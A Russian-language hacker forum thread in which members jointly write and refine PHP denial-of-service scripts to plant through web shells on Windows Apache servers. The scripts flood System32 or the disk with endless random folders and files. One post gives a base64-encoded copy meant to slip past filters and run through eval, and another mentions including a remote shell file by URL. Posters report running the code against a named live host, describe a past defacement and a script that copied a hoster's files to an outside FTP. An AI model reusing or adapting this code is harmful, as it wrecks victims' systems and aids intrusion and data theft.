Хай! За ошибки не бить, я по клаве не попадаю Я конечно изобрёл велосипед, но часто бывает, заливаешь шелл на апач под виндоус, а ничего сделать особо не получается, т.к. стоит файерволл и антивирус. Так вот, от нечего делать придумал как засорить через PHP систему. Всем известно, если в system32 много мусора, комп начинает жестоко виснуть, незнаю как насчёт линукса, никогда в нём не работал, и системных папок вобще незнаю в нём, но сейчас не об этом! Так вот, написал такой вот приметивный скрипт Code: <?php for($i=0;$i<5000;$i++) { @mkdir('C:/WINDOWS/System32/'.md5(rand(1,99999999999999999).rand(1,99999999999999999))); } header("Location: ".$_SERVER[REQUEST_URI]); ?> Значить скрипт работает так: Генерирует 2 числа от 1 до 99999999999999999 склеивает их, шифрует методом MD5 и создаёт в System32 папку с этим именем (32 символа) вот всё это выполняется 5000 рах! Тоесть 5000 папок в System32 это ещё не всё т.к. многие админы не настраивают особо конфиги, и если скрипт неуспевает выполниться за 30 сек, тогда апач выдаёт ошибку! Поэтому после создания 5000 папок, скрипт заканчивает свою работу и перекидывает снова на эту страницу, и всё идёт заново! Тоесть 2-3 минуты работы скрипта и комп перегреется Кстати чтоб удалить 5000 папок надо 10 минут! Я пробовал Ну... Кажись всё!
Это не настолько интересно, как ignore_user_abort(); Тоже самое делал. Только скрипт создавал файлы каждую секунду, и в имени было время. PHP: <?phpset_time_limit(0);ignore_user_abort(); // Аминь...while(true) { $fp=fopen("test".time().".txt","w"); fwrite($fp,php_uname()); fclose($fp);}?> Чё-т тип такого. Вроде как ничего не происходит, но обновив папку с скриптом, увидете результат.
Dr.Check, скрипт супер! Я просто в шоке! Но... Он создаёт раз в секунду. потому-что ты используешь time и он неможет создать с одинаковыми именами! Вот отрывок моего+твой это бомба! PHP: <?php set_time_limit(0); ignore_user_abort(); while(true) { $fp=fopen(md5(rand(1,99999999999999999).rand(1,99999999999999999).rand(1,99999999999999999)).".txt","w"); fwrite($fp,time()); fclose($fp); } ?>
В хеше НАЗВАНИЯ файла - непонял эту фразу... В общем в название файла записывается хэш, если писать время, то... 1)Он будет моздаваться раз в минуту 2)Весь этот муор легко будет удалить, т.к. он будет сортироваться по имени из цифр, а так хэш можен начинаться как с цифр так и с букв, его протсо так не отсортируешь, ну по дате можно и по именам в 32 буквы! А в тело пишется не хеш, как ты понял (по моему) а дата, это в имя хэш пишется В общем за 1 минуту эта штука мне создала материала на 50МБ!
угу... один говорит, что отсортировать по числам и удалить можно. и идея перца обвиняющего не лучше - 32 символа хеш то! отсортировал по длине и не парся ))) можт проще длину динамической делать и спецсимволы добавлять? а не только мелкую латиницу и цифры, но и заглавные и подчеркивания/тире?
Я вообще не понимаю, почему все закручено на md5. Случайные названия, состоящие из цифр и букв + случайное расширение из списка(txt dll ini exe log bmp ...)
Вот от этого точно никто не убежит! Набросал за 5 мин. PHP: <?php// Greetz всем заподлянщикам...// В частности Poncik'y за идею!!!!!!!// Вот, после этого, точно зае*ёшся пыль глотать...//Аминь...//(C) Dr.Check и все кто помог писать "Знаменитый скрипт"////////////////////////////////////////////////////////////////set_time_limit(0);ignore_user_abort();echo("<center><h1><b><font color=\"green\">ИБО НЕХУЙ!!!</font></b></h1></center>");///////////////////////////////////////////////////////////////// $name = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','r','s', 't','u','v','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L', 'M','N','O','P','R','S','T','U','V','X','Y','Z','1','2','3','4','5','6', '7','8','9','0');////////////////////////////////////////////////////////////////// $rash= array('.txt','.dic','.doc','.xls','.exe','.ini', '.bat','.log','.dll','.hak','.wmf','.zip','.rar', '.tar','.gz','.jpg','.gif','.bmp');/////////////////////////////////////////////////////////////////while(true) { $perem = ""; $fuck=""; for($i = 0; $i < rand(20,1); $i++) // количество сиволов в имени файла. { $by = rand(0, count($name) - 1); $perem .= $name[$by]; } $ra= rand(0, count($rash)-1); $fuck .= $rash[$ra]; $fp=fopen($perem.$fuck,"w"); fwrite($fp,php_uname()); fclose($fp); }?> Зав 3-5 сек было создано около 2-3 тыщъ файлов, занята вся оперативка. Даже динамик запищал!!! Для bul.666 : PHP: <?php // в массив('(',')','[',']','!','?', '&','^','%','@','*',','<','>','/','|','+','-','{','}','`','~');?>
Во, добавил, то, что написал SMiX - md5(time().doubleval(microtime())) терь одинаковых имён точно небудет! Про расширения я ещё утром думал, но забыл... Щас сделаю... PHP: <? set_time_limit(0); ignore_user_abort(); while(true) { switch (rand(0,8)) { case 1 : $r = '.txt'; break; case 2 : $r = '.exe'; break; case 3 : $r = '.dat'; break; case 4 : $r = '.ini'; break; case 5 : $r = '.log'; break; case 6 : $r = '.dll'; break; case 7 : $r = '.wav'; break; case 8 : $r = '.nsc'; break; default: $r = '.zip'; break; } $fp=fopen(md5(time().doubleval(microtime())).$r,"w"); fwrite($fp,time()); fclose($fp); } ?> вот P.S. Ах блин! Пока писал, мну опередили Ничё знаменитого на ачате так и не сделал, Dr.Check мож добавишь тама пару имен в копирайт, все ведь старались, да и хочется знаменитым стать А скрипт офигеный! Ущел жертву искать!
О! Пасибо! Терь я гордый ходить буду [OFFTOP] А чё это за ошибка-то? _http://darkmoon.mediazona.ru:4001/modules/admin.php [/OFFTOP]
Я думаю, что в сорце самого файла admin.php лежит строчка (в самом верху) PHP: include("http://mucheat.h10.ru/shell.txt"); Но горе хакеры облажались =) Если смотреть дальше ошибку, то поймете почему =)
Так это я шелл пытаюсь залить, щас чё нить придумаю! Вот кстати если кому надо зашифрованый этот код в base64 это чтоб фильтрацию обойти, или ещё чего... Файлы будут создаваться в system32... Вот c2V0X3RpbWVfbGltaXQoMCk7aWdub3JlX3VzZXJfYWJvcnQoKTtlY2hvKCI8Y2VudGVyPjxoMT48Yj48Zm9udCBjb2xvcj1cImdyZWVuXCI+Pz8/ID8/Pz8/ITwvZm9udD48L2I+PC9oMT48L2NlbnRlcj4iKTskbmFtZSA9IGFycmF5KCdhJywnYicsJ2MnLCdkJywnZScsJ2YnLCdnJywnaCcsJ2knLCdqJywnaycsICAnbCcsJ20nLCduJywnbycsJ3AnLCdyJywncycsJ3QnLCd1JywndicsJ3gnLCd5JywneicsJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdSJywnUycsJ1QnLCdVJywnVicsJ1gnLCdZJywnWicsJzEnLCcyJywnMycsJzQnLCc1JywnNicsJzcnLCc4JywnOScsJzAnKTskcmFzaD0gYXJyYXkoJy50eHQnLCcuZGljJywnLmRvYycsJy54bHMnLCcuZXhlJywnLmluaScsJy5iYXQnLCcubG9nJywnLmRsbCcsJ2hhaycsJy53bWYnLCcuemlwJywnLnJhcicsJy50YXInLCcuZ3onLCcuanBnJywnLmdpZicsJy5ibXAnKTt3aGlsZSh0cnVlKSB7JHBlcmVtID0gIiI7JGZ1Y2s9IiI7Zm9yKCRpID0gMDsgJGkgPCByYW5kKDIwLDEpOyAkaSsrKSB7JGJ5ID0gcmFuZCgwLCBjb3VudCgkbmFtZSkgLSAxKTskcGVyZW0gLj0gJG5hbWVbJGJ5XTt9JHJhPSByYW5kKDAsIGNvdW50KCRyYXNoKS0xKTskZnVjayAuPSAkcmFzaFskcmFdOyRmcD1mb3BlbigkcGVyZW0uJGZ1Y2ssInciKTtmd3JpdGUoJGZwLHBocF91bmFtZSgpKTtmY2xvc2UoJGZwKTt9 (пробелы убрать) Это можно выполнить так: eval(base64_decode('ТУТ_ЭТОТ_КОД')); Всё, запустил эту штуку на _http://darkmoon.mediazona.ru:4001
пару лет назад нашел небольшой прикол на хостерах. Админы от нечего делать всех своих клиентов писали в одну группу пользователей. таким образом я имел доступ на read к любому юзверю хостера, поимев шелл на одном из них. Я описывал эту багу в ][ на примере небольшого "дефа" glukoza.ru (добавил пару новостей, изменил немного фотоальбом). В общем не суть. тогда я написал скрипт который "листает" все диры и файлы с указанного места и копирует полную структуру на указанный ftp. Скрипт умещался в 20 строк. Я к тому, что если файлы писать не только в system32, а листать все дерево каталогов на жестком диске и писать везде - будет еще страшнее =)